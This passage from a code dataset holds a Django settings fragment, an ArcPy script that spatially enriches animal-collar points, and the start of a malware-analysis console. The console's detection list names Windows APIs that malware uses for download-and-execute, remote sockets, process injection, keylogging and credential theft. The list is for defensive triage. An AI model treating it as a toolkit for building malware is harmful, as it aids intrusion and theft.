[\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': ['templates'],\n 'APP_DIRS': True,\n 'OPTIONS': {\n # 'loaders': [\n # (\n # 'django.template.loaders.cached.Loader', [\n # 'django.template.loaders.filesystem.Loader',\n # 'django.template.loaders.app_directories.Loader',\n # ]\n # ),\n # ],\n 'context_processors': [\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'django.template.context_processors.media',\n 'django.template.context_processors.i18n',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'halaqat.wsgi.application'\n\n# Database\n# https://docs.djangoproject.com/en/1.8/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.8/topics/i18n/\n\nLANGUAGE_CODE = 'en'\n\nTIME_ZONE = 'Asia/Kuwait'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nLANGUAGES = (\n ('ar', _('Arabic')),\n ('en', _('English')),\n )\n\nLOCALE_PATHS = (\n os.path.join(BASE_DIR, \"locale\"),\n)\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.8/howto/static-files/\n\nSTATIC_URL = '/static/'\n\nSTATICFILES_DIRS = (\n os.path.join(BASE_DIR, \"static\"),\n)\n\n# Crispy Forms\n\nCRISPY_TEMPLATE_PACK = 'bootstrap3'\n\nLOGIN_REDIRECT_URL = '/'\nLOGIN_URL = '/login'\n","repo_name":"EmadMokhtar/halaqat","sub_path":"halaqat/settings/base_settings.py","file_name":"base_settings.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"30263872723","text":"import datetime\r\nimport json\r\nfrom datetime import timedelta\r\nfrom datetime import datetime as dt\r\nimport time\r\nimport logging\r\nimport logging.handlers\r\nimport google.cloud.logging\r\nimport sys\r\nimport traceback\r\nimport arcpy\r\nimport os\r\nfrom os.path import basename\r\nfrom os.path import join\r\nimport multilog\r\n\r\n\r\narcpy.env.workspace = \"in_memory\" \r\narcpy.env.overwriteOutput = True\r\narcpy.env.preserveGlobalIds = True\r\n\r\n\r\nVERSION = '1.0.0'\r\n\r\nLOCAL_LOGS = '../logs/enricher.log'\r\n\r\nSD_LOG_NAME = 'python.scheduled'\r\nLABELS = {'file': basename(__file__), 'version': VERSION}\r\nSD_LOGGING_KEY = '../.secrets/python-logging.json'\r\nCLOUD_LOGGING = True\r\n\r\nclass Config(object):\r\n \"\"\"Configs for script inputs and outputs.\"\"\"\r\n json_type_key = '__input_config__'\r\n\r\n def __init__(\r\n self,\r\n workspace, \r\n collars_table, \r\n date_field, \r\n globalid_field,\r\n related_guid_field,\r\n output_table):\r\n \r\n self.workspace = workspace\r\n self.collars_table = collars_table\r\n self.date_field = date_field\r\n self.globalid_field = globalid_field\r\n self.related_guid_field = related_guid_field\r\n self.output_table = output_table\r\n \r\n @staticmethod\r\n def decode_config(dct):\r\n \"\"\"Decode config from json.\"\"\"\r\n if Config.json_type_key in dct:\r\n configs = Config(\r\n dct['workspace'], \r\n dct['collars_table'], \r\n dct['date_field'], \r\n dct['globalid_field'], \r\n dct['related_guid_field'], \r\n dct['output_table'])\r\n return configs\r\n else:\r\n return dct\r\n \r\n @staticmethod\r\n def encode_config(config):\r\n \"\"\"Encode config to json.\"\"\"\r\n if isinstance(config, Config):\r\n field_dict = config.__dict__\r\n field_dict[Config.json_type_key] = ''\r\n return field_dict\r\n else:\r\n type_name = config.__class__.__name__\r\n raise TypeError('Object of type {} is not JSON serializable'.format(type_name))\r\n\r\n\r\nclass EnrichmentData(object):\r\n \"\"\"Features used for point enrichment.\"\"\"\r\n def __init__(self, path, field_mappings):\r\n self.path = path\r\n self.field_mappings = field_mappings\r\n \r\n @staticmethod\r\n def decode_enrichment(dct):\r\n \"\"\"Decode enrichment data feature from json.\"\"\"\r\n if 'path' in dct and 'field_mappings' in dct:\r\n return EnrichmentData(dct['path'], dct['field_mappings'])\r\n else:\r\n return dct\r\n \r\n @staticmethod\r\n def encode_enrichment(enrichment):\r\n \"\"\"Encode enrichment data feature to json.\"\"\"\r\n if isinstance(enrichment, EnrichmentData):\r\n field_dict = enrichment.__dict__\r\n return field_dict\r\n else:\r\n type_name = enrichment.__class__.__name__\r\n raise TypeError('Object of type {} is not JSON serializable'.format(type_name))\r\n\r\n\r\ndef get_querylayer_for_yesterday(workspace, table_name, guid_field, date_field, today=None):\r\n \"\"\"Create a query layer that includes only data for the previous day.\"\"\"\r\n if today is None:\r\n yesterday = dt.now() - timedelta(days=1)\r\n else:\r\n yesterday = today - timedelta(days=1)\r\n\r\n start_of_day = dt(yesterday.year, yesterday.month, yesterday.day)\r\n start_day_string = dt.strftime(start_of_day, \"%Y-%m-%d %H:%M:%S\")\r\n end_of_day = start_of_day + timedelta(days=1)\r\n end_day_string = dt.strftime(end_of_day, \"%Y-%m-%d %H:%M:%S\")\r\n logger.multi_log('Making query layer for {}. Date range: {} to {}'.format(\r\n table_name,\r\n start_day_string, \r\n end_day_string),\r\n 'INFO')\r\n #where clause for the time range\r\n where_clause = \\\r\n \"\"\"\r\n select {fields_list} from {table} \r\n where \r\n {field} >= '{start}'\r\n AND\r\n {field} < '{end}'\r\n \"\"\".format(\r\n fields_list=guid_field + ', SHAPE',\r\n table=table_name,\r\n field=date_field,\r\n start=start_day_string,\r\n end=end_day_string)\r\n \r\n ql_name = \"date_query_result\"\r\n ql_start_time = time.time()\r\n arcpy.MakeQueryLayer_management(\r\n workspace, ql_name, where_clause)\r\n ql_time = round(time.time() - ql_start_time, 4)\r\n logger.multi_log('Query layer creation time: {} seconds'.format(ql_time),\r\n 'INFO',\r\n CLOUD_LOGGING,\r\n {'action': 'ql creation',\r\n 'feature': table_name,\r\n 'time': ql_time})\r\n \r\n return ql_name\r\n\r\n\r\ndef get_enriched_points(querylayer_points, enrichment_data, fields_to_keep):\r\n \"\"\"Join points to enrichment feature and keep specified fields\"\"\"\r\n #defining features for the spatial join\r\n join_features = enrichment_data\r\n join_describe = arcpy.Describe(join_features)\r\n target_features = querylayer_points\r\n target_describe = arcpy.Describe(target_features)\r\n join_output = 'in_memory\\\\spatial_join'\r\n temp_out_name = join_output\r\n n = 1\r\n while arcpy.Exists(temp_out_name):\r\n temp_out_name = join_output + str(n)\r\n n += 1\r\n join_output = temp_out_name\r\n\r\n logger.multi_log(\r\n 'Enriching {} with {}'.format(target_describe.name, join_describe.name),\r\n 'INFO',\r\n CLOUD_LOGGING)\r\n logger.multi_log('Keep fields: {}'.format(','.join(fields_to_keep)), 'DEBUG')\r\n\r\n if join_describe.spatialReference.name != target_describe.spatialReference.name:\r\n logger.multi_log(\r\n 'Spatial reference mismatch: join={}, target={}'.format(\r\n target_describe.spatialReference.name,\r\n join_describe.spatialReference.name),\r\n 'WARNING',\r\n CLOUD_LOGGING,\r\n {'feature': basename(join_features)})\r\n\r\n #field map to determine which fields to keep\r\n fieldmappings = arcpy.FieldMappings()\r\n # Add all fields from inputs.\r\n fieldmappings.addTable(join_features)\r\n fieldmappings.addTable(target_features)\r\n\r\n keep_fields = set([f.lower() for f in fields_to_keep])\r\n # Check that keep fields are actually in these data\r\n mapped_field_names = set([f.name.lower() for f in fieldmappings.fields])\r\n field_intersect = keep_fields.intersection(mapped_field_names)\r\n if field_intersect != keep_fields:\r\n logger.multi_log(\r\n 'Keep fields not in either dataset: {}'.format(','.join(keep_fields - field_intersect)),\r\n 'WARNING')\r\n\r\n for field in fieldmappings.fields:\r\n if field.name.lower() not in keep_fields:\r\n fieldmappings.removeFieldMap(\r\n fieldmappings.findFieldMapIndex(field.name))\r\n\r\n # Join datasets spatially\r\n join_start_time = time.time()\r\n arcpy.analysis.SpatialJoin(\r\n target_features, join_features, join_output,\r\n \"JOIN_ONE_TO_ONE\",\r\n \"KEEP_ALL\",\r\n fieldmappings)\r\n join_time = round(time.time() - join_start_time, 4)\r\n logger.multi_log(\r\n 'Join processing time: {} seconds'.format(join_time),\r\n 'INFO',\r\n CLOUD_LOGGING,\r\n {'action': 'join',\r\n 'feature': basename(join_features),\r\n 'time': join_time,\r\n 'message': 'Join processing'})\r\n\r\n #removing uneeded fields created from join\r\n arcpy.DeleteField_management(join_output, [\"Join_Count\", \"TARGET_FID\"])\r\n\r\n return join_output\r\n\r\n\r\ndef mutliple_enrichment(querylayer_points, globalid_field, enrichment_features):\r\n \"\"\"Enrich points with fields from list of feature classes.\"\"\"\r\n enriched = querylayer_points\r\n accumulated_fields = [globalid_field]\r\n for feature in enrichment_features:\r\n old_enriched = enriched\r\n accumulated_fields.extend([f[0] for f in feature.field_mappings])\r\n enriched = get_enriched_points(\r\n enriched,\r\n feature.path,\r\n accumulated_fields)\r\n arcpy.Delete_management(old_enriched)\r\n \r\n return enriched\r\n\r\n\r\ndef _get_config(config_location):\r\n \"\"\"Get input and output configs from json.\"\"\"\r\n with open(config_location, 'r') as json_file:\r\n configs = json.load(json_file, object_hook=Config.decode_config)\r\n\r\n return configs\r\n\r\n\r\ndef _get_enrichment_data(config_location):\r\n enrichment_data = []\r\n with open(config_location, 'r') as json_file:\r\n enrichment_data = json.load(json_file, object_hook=EnrichmentData.decode_enrichment)\r\n\r\n return enrichment_data\r\n\r\n\r\ndef _load_data(enriched_points, destination_table, enrichment_features, globalid_field, related_guid_field):\r\n logger.multi_log('Loading data into: ' + destination_table, 'INFO', CLOUD_LOGGING)\r\n source_fields = []\r\n destination_fields = []\r\n for feature in enrichment_features:\r\n for source, dest in feature.field_mappings:\r\n source_fields.append(source)\r\n destination_fields.append(dest)\r\n source_fields.append(globalid_field)\r\n destination_fields.append(related_guid_field)\r\n\r\n with arcpy.da.SearchCursor(enriched_points, source_fields) as enriched_cursor, \\\r\n arcpy.da.InsertCursor(destination_table, destination_fields) as destination_cursor:\r\n for row in enriched_cursor:\r\n destination_cursor.insertRow(row)\r\n\r\n\r\nif __name__ == '__main__':\r\n # Set directory to the directory of this file.\r\n dir_path = os.path.dirname(os.path.realpath(__file__))\r\n os.chdir(dir_path)\r\n \r\n input_config_location = '../configs/point_enrichment_input.json'\r\n enrichment_config_location = '../configs/point_enrichment_data.json'\r\n\r\n configs = _get_config(input_config_location)\r\n\r\n enrichment_features = _get_enrichment_data(enrichment_config_location)\r\n\r\n logger = multilog.MutliLogger('enricher', LOCAL_LOGS, SD_LOGGING_KEY, SD_LOG_NAME, LABELS)\r\n \r\n try:\r\n ql_name = get_querylayer_for_yesterday(\r\n configs.workspace,\r\n configs.collars_table,\r\n configs.globalid_field,\r\n configs.date_field)\r\n ql_count = arcpy.management.GetCount(ql_name)[0]\r\n logger.multi_log(\r\n 'Query layer point count: {}'.format(ql_count),\r\n 'INFO',\r\n CLOUD_LOGGING,\r\n {'action': 'ql count',\r\n 'feature': configs.collars_table,\r\n 'count': ql_count})\r\n \r\n # Query Layers don't spatially join correctly and won't copy to in_memory\r\n output_gdb = join(dir_path, '..', 'data', 'enrichment_output.gdb')\r\n if not arcpy.Exists(output_gdb):\r\n arcpy.management.CreateFileGDB(os.path.dirname(output_gdb), os.path.basename(output_gdb))\r\n \r\n logger.multi_log('Copying query layer points locally', 'INFO', CLOUD_LOGGING)\r\n points_feature = arcpy.management.CopyFeatures(ql_name, join(output_gdb, 'points'))[0]\r\n\r\n enriched = mutliple_enrichment(\r\n points_feature,\r\n configs.globalid_field,\r\n enrichment_features)\r\n\r\n _load_data(\r\n enriched,\r\n join(configs.workspace, configs.output_table),\r\n enrichment_features,\r\n configs.globalid_field,\r\n configs.related_guid_field)\r\n\r\n except Exception as e:\r\n logger.multi_log(\r\n e,\r\n 'ERROR',\r\n CLOUD_LOGGING)\r\n finally:\r\n logging.shutdown()","repo_name":"agrc/dwr-tracking","sub_path":"src/point_enricher.py","file_name":"point_enricher.py","file_ext":"py","file_size_in_byte":11350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2583716392","text":"#!/usr/bin/python3\n#-*- coding:utf-8 -*-\n\nimport sys\nimport time\nimport json\nimport shlex\nimport subprocess\n\ntry:\n from xsearch import * # virustotal search\nexcept ImportError:\n print(\"[!] Error Import Xsearch !\")\n\ntry:\n from md5sum import *\nexcept ImportError:\n print(\"[!] Error Import MD5sum !\")\n\ntry:\n from datetime import datetime\nexcept ImportError:\n print(\"[!] Error Import Datetime !\")\n\ntry:\n import requests\nexcept ImportError:\n print(\"[!] Requests Required !\")\n\ntry:\n import pefile\nexcept ImportError:\n print(\"[!] PEfile Required !\")\n\ntry:\n from tabulate import tabulate\nexcept ImportError:\n print(\"[!] Tabulate Required !\")\n\n\nbanner = '''\n\\033[38;5;160m\n\n ███▄ ▄███▓ ██████ ▄████▄ ▄▄▄ ███▄ █ \n▓██▒▀█▀ ██▒▒██ ▒ ▒██▀ ▀█ ▒���███▄ ██ ▀█ █ \n▓██ ▓██░░ ▓██▄ ▒▓█ ▄ ▒██ ▀█▄ ▓██ ▀█ ██▒\n▒██ ▒██ ▒ ██▒▒▓▓▄ ▄██▒░██▄▄▄▄██ ▓██▒ ▐▌██▒\n▒██▒ ░██▒▒██████▒▒▒ ▓███▀ ░ ▓█ ▓██▒▒██░ ▓██░\n░ ▒░ ░ ░▒ ▒▓▒ ▒ ░░ ░▒ ▒ ░ ▒▒ ▓▒█░░ ▒░ ▒ ▒ \n░ ░ ░░ ░▒ ░ ░ ░ ▒ ▒ ▒▒ ░░ ░░ ░ ▒░\n░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ \n ░ ░ ░ ░ ░ ░ ░ \n ░ \n \n\\033[00m\n Automatic Analysis Tools\n\n [ Created By \\033[38;5;160mUnam3dd \\033[00m ]\n [ Github : \\033[38;5;160mUnam3dd \\033[00m ]\n\n'''\n\nMALICIOUS_FUNCTION = [\"accept\",\"AdjustTokenPrivileges\",\"AttachThreadInput\",\n\"bind\",\"BitBlt\",\"CallNextHookEx\",\n\"CertOpenSystemStore\",\"CheckRemoteDebuggerPresent\",\"CoCreateInstance\",\n\"connect\",\"ConnectNamedPipe\",\"ControlService\",\n\"CreateFile\",\"CreateFileMapping\",\"CreateMutex\",\n\"CreateProcess\",\"CreateRemoteThread\",\"CreateService\",\n\"CreateToolhelp32Snapshot\",\"CryptAcquireContext\",\"DeviceIoControl\",\n\"DllCanUnloadNow\",\"DllGetClassObject\",\"DllInstall\",\n\"DllRegisterServer\",\"DllUnregisterServer\",\"EnableExecuteProtectionSupport\",\n\"EnumProcesses\",\"EnumProcessModules\",\"FindFirstFile/FindNextFile\",\n\"FindResource\",\"FindWindow\",\"FtpPutFile\",\"GetAdaptersInfo\",\n\"GetAsyncKeyState\",\"GetDC\",\"GetForegroundWindow\",\n\"gethostbyname\",\"gethostname\",\"GetKeyState\",\"GetModuleFilename\",\n\"GetModuleHandle\",\"GetProcAddress\",\"GetStartupInfo\",\"GetSystemDefaultLangId\",\n\"GetTempPath\",\"GetThreadContext\",\"GetTickCount\",\"GetVersionEx\",\n\"GetWindowsDirectory\",\"inet_addr\",\"InternetOpen\",\"InternetOpenUrl\",\n\"InternetReadFile\",\"InternetWriteFile\",\"IsDebuggerPresent\",\"IsNTAdmin\",\n\"IsWoW64Process\",\"LdrLoadDll\",\"LoadLibrary\",\"LoadResource\",\"LsaEnumerateLogonSessions\",\n\"MapViewOfFile\",\"MapVirtualKey\",\"MmGetSystemRoutineAddress\",\"Module32First/Module32Next\",\n\"NetScheduleJobAdd\",\"NetShareEnum\",\"NtQueryDirectoryFile\",\"NtQueryInformationProcess\",\n\"NtSetInformationProcess\",\"OleInitialize\",\"OpenMutex\",\"OpenProcess\",\"OpenSCManager\",\n\"OutputDebugString\",\"PeekNamedPipe\",\"Process32First\",\"Process32Next\",\"QueryPerformanceCounter\",\n\"QueueUserAPC\",\"ReadProcessMemory\",\"recv\",\"RegisterHotKey\",\"RegOpenKey\",\"ResumeThread\",\n\"RtlCreateRegistryKey\",\"RtlWriteRegistryValue\",\"SamIConnect\",\"SamIGetPrivateData\",\n\"SamQueryInformationUse\",\"send\",\"SetFileTime\",\"SetThreadContext\",\"SetWindowsHookEx\",\n\"SfcTerminateWatcherThread\",\"ShellExecute\",\"StartServiceCtrlDispatcher\",\n\"SuspendThread\",\"system\",\"Thread32First\",\"Thread32Next\",\"Toolhelp32ReadProcessMemory\",\n\"URLDownloadToFile\",\"VirtualAllocEx\",\"VirtualProtectEx\",\"WideCharToMultiByte\",\"WinExec\",\n\"WlxLoggedOnSAS\",\"Wow64DisableWow64FsRedirection\",\"WriteProcessMemory\",\"WSAStartup\",\n\"WSASocketA\",\"WSAConnect\",\"WSAGetLastError\",\"closesocket\",\"htons\",\"ShellExecuteA\",\"_popen\"\n\"GetStartupInfoA\",\"FreeConsole\",\"CreateProcessA\",\"CreateMutexA\",\"GetTokenInformation\",\"GetUserNameA\",\"FtpPutFileA\",\"FtpGetFileA\",\n\"InternetOpenA\",\"InternetConnectA\"]\n\ndef check_malicious_function(pe):\n if pe.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_IMPORT']].VirtualAddress ==0:\n print(\"[!] Import Not Found !\")\n \n import_table = []\n for entry in pe.DIRECTORY_ENTRY_IMPORT:\n dll_name = entry.dll.decode(\"utf-8\")\n for imp in entry.imports:\n if imp.name == None:\n import_name = \"Ordinal: \" + str(imp.ordinal)\n else:\n import_name = imp.name.decode(\"utf-8\")\n \n import_table.append([import_name,dll_name])\n \n function_len = len(import_table)\n print(\"\\033[32m[\\033[34m*\\033[32m] Function in Binary File : %d \" % (function_len))\n headers = [\"Potential Malicious Function Found\",\"DLL\"]\n ml_get = []\n count_mf = len(MALICIOUS_FUNCTION)\n print(\"\\033[32m[\\033[34m*\\033[32m] Potential Malicious Function : %d \" % (count_mf))\n for table_function in import_table:\n for ml in MALICIOUS_FUNCTION:\n if ml == table_function[0]:\n ml_get.append([\"\\033[34m%s\\033[00m\" % (ml),\"\\033[38;5;184m%s\\033[00m\" % (table_function[1])])\n else:\n pass\n \n ratio = []\n count_ml = len(ml_get)\n ratio.append([count_ml,count_mf])\n \n print(tabulate(ml_get,headers=headers,tablefmt=\"fancy_grid\"))\n print(tabulate(ratio,headers=[\"Potential Malicious Function\",\"Total Binary Function\"],tablefmt=\"fancy_grid\"))\n\n\ndef get_imports_function(pe):\n\tif pe.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_IMPORT']].VirtualAddress == 0:\n\t\tprint(\"no imports found\")\n\n\timport_table = []\n\theaders = [\"Import Name\", \"DLL Name\"]\n\n\tfor entry in pe.DIRECTORY_ENTRY_IMPORT:\n\t\tdll_name = entry.dll.decode(\"utf-8\")\n\t\tfor imp in entry.imports:\n\t\t\tif imp.name == None: import_name = \"Ordinal: \" + str(imp.ordinal)\n\t\t\telse: import_name = imp.name.decode(\"utf-8\")\n\t\t\timport_table.append([import_name, dll_name])\n\n\tprint(tabulate(import_table, headers=headers, tablefmt=\"fancy_grid\"))\n\ndef sha256sum(filename):\n f=open(filename,\"r\",encoding=\"cp437\")\n content = f.read()\n f.close()\n h = hashlib.sha256()\n h.update(content.encode(\"cp437\"))\n hex_digest = h.hexdigest()\n return hex_digest\n\ndef sha256sum_bin(filename):\n f=open(filename,\"rb\")\n content = f.read()\n f.close()\n h = hashlib.sha256()\n h.update(content)\n hex_digest = h.hexdigest()\n return hex_digest\n\n\nif __name__ == '__main__':\n python_version()\n clear_os()\n print(banner)\n while True:\n try:\n t = datetime.now().strftime(\"%H:%M:%S\")\n console = str(input(\"\\033[00m[\\033[38;5;160m%s\\033[00m:Malware@Main] \\033[38;5;160m>> \" % (t)))\n\n if console ==\"exit\" or console ==\"quit\":\n sys.exit()\n \n elif console.startswith(\"!\")==True:\n os.system(console[1:])\n \n elif console ==\"help\" or console ==\"?\" or console ==\"h\":\n print(\"[****************************************************************]\")\n print(\"[ Malware Scan ]\")\n print(\"[ commands descriptions ]\")\n print(\"[ ---------- -------------- ]\")\n print(\"[ banner Banner ]\")\n print(\"[ cls or clear Clear Console ]\")\n print(\"[ xsearch_uf Xsearch upload file to virtustotal ]\")\n print(\"[ xsearch_sh Xsearch with hash file ]\")\n print(\"[ xsearch_uu Xsearch Scan URL ]\")\n print(\"[ !command !dir, !type etc... ]\")\n print(\"[ md5sum Get Hash Md5 Of target file ]\")\n print(\"[ md5sumbin Get MD5 Bin File ]\")\n print(\"[ sha256sum Get SHA256 File ]\")\n print(\"[ sha256sumbin Get SHA256 Bin File ]\")\n print(\"[ show_import Get Import Function From PE File ]\")\n print(\"[ check_function Check Function Malicious in Binary ]\")\n print(\"[ dump_info Dump PE info of Binary File ]\")\n print(\"[ strings Strings Output ]\")\n print(\"[****************************************************************]\")\n print(\"\\n\\n\")\n \n elif console ==\"clear\" or console ==\"cls\":\n clear_os()\n \n elif console.startswith(\"show_import\")==True:\n shlex_console_si = shlex.split(console)\n if len(shlex_console_si) < 2:\n print(\"\\033[38;5;160m[!] Error Show Import : %s \\033[00m\" % (shlex_console_si[0]))\n else:\n try:\n p = pefile.PE(shlex_console_si[1])\n get_imports_function(p)\n except:\n print(\"\\033[38;5;160m[!] Error Show Import \")\n \n\n elif console.startswith(\"strings\")==True:\n shlex_console_strings = shlex.split(console)\n if len(shlex_console_strings) < 2:\n print(\"\\033[38;5;160m[!] Error Show Import : %s \\033[00m\" % (shlex_console_si[0]))\n else:\n try:\n p = subprocess.Popen([\"strings\",shlex_console_strings[1]],shell=True,stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out_p = p.stdout.read() + p.stderr.read()\n out_p = out_p.decode(\"utf-8\")\n print(out_p)\n except:\n print(\"\\033[38;5;160m[!] Error Show strings\")\n\n \n elif console.startswith(\"dump_info\")==True:\n shlex_console_di = shlex.split(console)\n if len(shlex_console_di) < 2:\n print(\"\\033[38;5;160m[!] Error Dump Info : %s \\033[00m\" % (shlex_console_si[0]))\n else:\n try:\n p = pefile.PE(shlex_console_di[1])\n p.print_info()\n except:\n print(\"\\033[38;5;160m[!] Error dump_info\")\n \n elif console.startswith(\"check_function\")==True:\n shlex_console_f = shlex.split(console)\n if len(shlex_console_f) < 2:\n print(\"\\033[38;5;160m[!] Error Show Import : %s \" % (shlex_console_f[0]))\n else:\n try:\n p = pefile.PE(shlex_console_f[1])\n check_malicious_function(p)\n except:\n print(\"\\033[38;5;160m[!] Error Show Import\")\n\n \n elif console.startswith(\"md5sum\")==True:\n shlex_console_main = shlex.split(console)\n if len(shlex_console_main) < 2:\n print(\"\\033[38;5;160m[!] Error : usage md5sum \")\n else:\n check_file_exists = os.path.exists(shlex_console_main[1])\n if check_file_exists ==True:\n print(\"\\033[32m[\\033[34m*\\033[32m] %s Found !\\033[00m\" % (shlex_console_main[1]))\n h = md5sum(shlex_console_main[1])\n b = get_bytes(shlex_console_main[1])\n print(\"\\033[32m[\\033[34m*\\033[32m] MD5 RAW Hash : %s\\n\\033[32m[\\033[34m*\\033[32m] Filename : %s\\n\\033[32m[\\033[34m*\\033[32m] Size : %d Bytes\" % (h,shlex_console_main[1],b))\n else:\n print(\"\\033[38;5;160m[!] Error %s Not Found !\\033[00m\" % (shlex_console_main[1]))\n \n elif console.startswith(\"md5sumbin\") ==True:\n shlex_console_main = shlex.split(console)\n if len(shlex_console_main) < 2:\n print(\"\\033[38;5;160m[!] Error : usage md5sumbin \")\n else:\n check_file_exists = os.path.exists(shlex_console_main[1])\n if check_file_exists ==True:\n print(\"\\033[32m[\\033[34m*\\033[32m] %s Found !\\033[00m\" % (shlex_console_main[1]))\n h = md5sum_bin(shlex_console_main[1])\n b = get_bytes(shlex_console_main[1])\n print(\"\\033[32m[\\033[34m*\\033[32m] MD5 BIN Hash : %s\\n\\033[32m[\\033[34m*\\033[32m] Filename : %s\\n\\033[32m[\\033[34m*\\033[32m] Size : %d Bytes\" % (h,shlex_console_main[1],b))\n else:\n print(\"\\033[38;5;160m[!] Error %s Not Found !\\033[00m\" % (shlex_console_main[1]))\n \n elif console.startswith(\"sha256sum\")==True:\n shlex_console_main = shlex.split(console)\n if len(shlex_console_main) < 2:\n print(\"\\033[38;5;160m[!] Error : usage sha256sum \")\n else:\n check_file_exists = os.path.exists(shlex_console_main[1])\n if check_file_exists ==True:\n print(\"\\033[32m[\\033[34m*\\033[32m] %s Found !\\033[00m\" % (shlex_console_main[1]))\n h = sha256sum(shlex_console_main[1])\n b = get_bytes(shlex_console_main[1])\n print(\"\\033[32m[\\033[34m*\\033[32m] SHA256 RAW Hash : %s\\n\\033[32m[\\033[34m*\\033[32m] Filename : %s\\n\\033[32m[\\033[34m*\\033[32m] Size : %d Bytes\" % (h,shlex_console_main[1],b))\n else:\n print(\"\\033[38;5;160m[!] Error %s Not Found !\\033[00m\" % (shlex_console_main[1]))\n \n elif console.startswith(\"sha256sumbin\")==True:\n shlex_console_main = shlex.split(console)\n if len(shlex_console_main) < 2:\n print(\"\\033[38;5;160m[!] Error : usage sha256sumbin \")\n else:\n check_file_exists = os.path.exists(shlex_console_main[1])\n if check_file_exists ==True:\n print(\"\\033[32m[\\033[34m*\\033[32m] %s Found !\\033[00m\" % (shlex_console_main[1]))\n h = sha256sum_bin(shlex_console_main[1])\n b = get_bytes(shlex_console_main[1])\n print(\"\\033[32m[\\033[34m*\\033[32m] SHA256 BIN Hash : %s\\n\\033[32m[\\033[34m*\\033[32m] Filename : %s\\n\\033[32m[\\033[34m*\\033[32m] Size : %d Bytes\" % (h,shlex_console_main[1],b))\n else:\n print(\"\\033[38;5;160m[!] Error %s Not Found !\\033[00m\" % (shlex_console_main[1]))\n \n elif console ==\"xsearch_uf\":\n FILENAME = \"None\"\n while True:\n try:\n t = datetime.now().strftime(\"%H:%M:%S\")\n console_xsearch_uf = str(input(\"\\033[00m[\\033[38;5;160m%s\\033[00m:Malware@Xsearch_upload_file] \\033[38;5;160m>> \" % (t)))\n \n if console_xsearch_uf ==\"exit\" or console_xsearch_uf ==\"quit\":\n sys.exit()\n \n elif console_xsearch_uf ==\"back\" or console_xsearch_uf ==\"b\":\n break\n\n elif console_xsearch_uf.startswith(\"!\")==True:\n os.system(console_xsearch_uf[1:])\n \n elif console_xsearch_uf ==\"help\" or console_xsearch_uf ==\"?\" or console_xsearch_uf ==\"h\":\n print(\"[ commands descriptions ]\")\n print(\"[ ---------- -------------- ]\")\n print(\"[ info show info module ]\")\n print(\"[ set FILENAME,etc... ]\")\n print(\"[ back Back To Main ]\")\n print(\"[ run Run Module ]\")\n print(\"\\n\")\n print(\"\\n\")\n \n elif console_xsearch_uf ==\"info\":\n print(\"[ NAME VALUE\")\n print(\"[ ---------- --------------\")\n print(\"[ FILENAME %s\" % (FILENAME))\n\n elif console_xsearch_uf.startswith(\"set\")==True:\n shlex_console = shlex.split(console_xsearch_uf)\n if len(shlex_console) <3:\n print(\"\\033[38;5;160m[!] Error usage : exemple : set FILENAME for show options type 'info'\\033[00m\")\n else:\n if shlex_console[1] ==\"filename\" or shlex_console[1] ==\"FILENAME\":\n value_filename = shlex_console[2]\n check_value = os.path.exists(value_filename)\n if check_value ==True:\n print(\"\\033[32m[\\033[34m*\\033[32m] %s Found !\\033[00m\" % (value_filename))\n FILENAME = value_filename\n print(\"\\033[32m[\\033[34m*\\033[32m] FILENAME => %s \\033[00m\" % (FILENAME))\n else:\n print(\"\\033[38;5;160m[!] Error %s Not Found !\\033[00m\" % (value_filename))\n \n elif console_xsearch_uf.startswith(\"run\")==True:\n if FILENAME ==None:\n print(\"\\033[38;5;160m[!] Error FILENAME => None !\\033[00m\")\n else:\n print(\"\\033[32m[\\033[34m*\\033[32m] if you don't have a key you can create one from this link\\nLink=> \\033[34mhttps://developers.virustotal.com/v3.0/reference\\033[00m\")\n api_key = str(input(\"\\033[00m[\\033[38;5;160m%s\\033[00m:Enter Virustotal API Key \\033[38;5;160m>> \" % (t)))\n send_file_api(api_key,FILENAME)\n\n else:\n print(\"\\033[38;5;160m[!] Error Command Not Found !\")\n\n except KeyboardInterrupt:\n print(\"\\033[38;5;160m[!] Error CTRl+C\")\n \n elif console ==\"xsearch_sh\":\n FILENAME = \"None\"\n while True:\n try:\n t = datetime.now().strftime(\"%H:%M:%S\")\n console_xsearch_sh = str(input(\"\\033[00m[\\033[38;5;160m%s\\033[00m:Malware@Xsearch_search_hash] \\033[38;5;160m>> \" % (t)))\n \n if console_xsearch_sh ==\"exit\" or console_xsearch_sh ==\"quit\":\n sys.exit()\n \n elif console_xsearch_sh ==\"back\" or console_xsearch_sh ==\"b\":\n break\n\n elif console_xsearch_sh.startswith(\"!\")==True:\n os.system(console_xsearch_sh[1:])\n \n elif console_xsearch_sh ==\"help\" or console_xsearch_sh ==\"?\" or console_xsearch_sh ==\"h\":\n print(\"[ commands descriptions ]\")\n print(\"[ ---------- -------------- ]\")\n print(\"[ info show info module ]\")\n print(\"[ set FILENAME,etc... ]\")\n print(\"[ back Back To Main ]\")\n print(\"[ run Run Module ]\")\n print(\"\\n\")\n print(\"\\n\")\n \n elif console_xsearch_sh ==\"info\":\n print(\"[ NAME VALUE\")\n print(\"[ ---------- --------------\")\n print(\"[ FILENAME %s\" % (FILENAME))\n print(\"\")\n\n elif console_xsearch_sh.startswith(\"set\")==True:\n shlex_console = shlex.split(console_xsearch_sh)\n if len(shlex_console) <3:\n print(\"\\033[38;5;160m[!] Error usage : exemple : set FILENAME for show options type 